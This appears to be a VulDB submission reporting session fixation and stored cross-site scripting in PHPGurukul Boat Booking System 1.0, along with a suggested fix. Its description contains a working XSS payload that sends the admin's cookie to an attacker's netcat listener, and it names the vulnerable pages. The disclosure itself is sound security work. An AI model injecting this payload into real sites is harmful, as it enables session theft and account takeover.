Submit #425414: PHPGurukul Boat Booking System 1.0 Session Fixiation
| Title | PHPGurukul Boat Booking System 1.0 Session Fixiation |
|---|---|
| Description | The session is being started (session_start()) without regenerating the session ID after login, which could expose the system to session fixation attacks. An attacker can force a session ID onto a victim and then hijack it after the victim logs in. Risk: If an attacker gets hold of the session ID (via XSS or other means), they could hijack the session and impersonate the user. Fix: After logging in, regenerate the session ID to prevent this attack. Via injecting <script>var i=new Image(); i.src="http://x.x.x.x:1234/?cookie="+btoa(document.cookie);</script> payload to forms in book-boat.php, attacker can inject a XSS payload. When admin user sign in to check on all-booking.php, payload will be triggered and admin cookie is forwarded to attacker's netcat listener, which can be used to login as the admin user without needing any credentials. |
| Source | ⚠️ https:/ |
| User | jadu101 (UID 70632) |
| Submission | 17.10.2024 06:12 (vor 5 Monaten) |
| Moderation | 18.10.2024 21:17 (2 days later) |
| Status | Akzeptiert |
| VulDB Entry | 280944 [PHPGurukul Boat Booking System 1.0 session_start schwache Authentisierung] |
| Points | 20 |